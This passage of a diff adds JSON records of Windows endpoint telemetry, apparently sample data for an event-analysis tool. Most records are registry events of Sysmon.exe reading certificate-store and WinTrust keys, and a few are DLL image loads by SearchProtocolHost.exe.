2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.StateRepositoryPS.dll", + "image_path": "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "edputil.dll", + "image_path": "C:\\Windows\\System32\\edputil.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": 